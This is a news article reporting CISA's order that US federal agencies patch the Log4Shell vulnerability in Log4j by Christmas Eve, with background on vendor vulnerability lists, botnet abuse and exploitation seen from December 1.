CISA tells federal agencies to patch Log4Shell before Christmas
The US Cybersecurity and Infrastructure Security Agency has told federal civilian agencies to patch systems affected by the Log4Shell vulnerability by Christmas Eve.
According to this catalog, federal agencies have ten days at their disposal to test which of their internal apps and servers utilize the Log4j Java library, check if systems are vulnerable to the Log4Shell exploit, and patch affected servers.
All of this must be done by December 24, according to a timeline provided in the catalog.
In addition, CISA has also launched yesterday a dedicated web page providing guidance to the US public and private sector regarding the Log4Shell vulnerability.
CISA plans to list all software vendors that have products vulnerable to the Log4Shell vulnerability on this page; in order to provide a central place where companies can get Log4Shell patching information. Patches for the Log4j library itself have been available since last week, but software vendors must also incorporate these patches into their own software as well.
At the time of writing, this page is currently empty, as the CISA staff is still gathering information via a GitHub project.
Luckily, security researcher Royce Williams has already compiled a list of what is and what is not vulnerable to Log4Shell, a list available here and containing information on more than 300 vendors. Another one is the list managed by the Dutch National Cyber Security Center.
The Log4Shell vulnerability was disclosed last Thursday. It is a bug in Log4j, a Java library that provides log creation and management capabilities for many Java desktop apps and server software.
Despite being a recent vulnerability, it is already considered one of the worst security flaws ever discovered, primarily due to its near-ubiquitous use among enterprise software makers, its simple and easy-to-use exploit, and the ability to hijack systems remotely.
Days after being disclosed, the vulnerability has been massively abused, has been incorporated into the arsenals of at least ten different malware botnets/operations, and is primed for abuse by cyber-espionage and ransomware groups.
Another aspect to consider is that both cisco and Cloudflare said they first saw signs of Log4Shell exploitation two weeks before the flaw was made public, meaning security teams need to broaden their incident response investigations and check for signs of possible exploitation against their networks to the start of the month, not just last week. More exactly, the first attacks were seen on December 1, this year.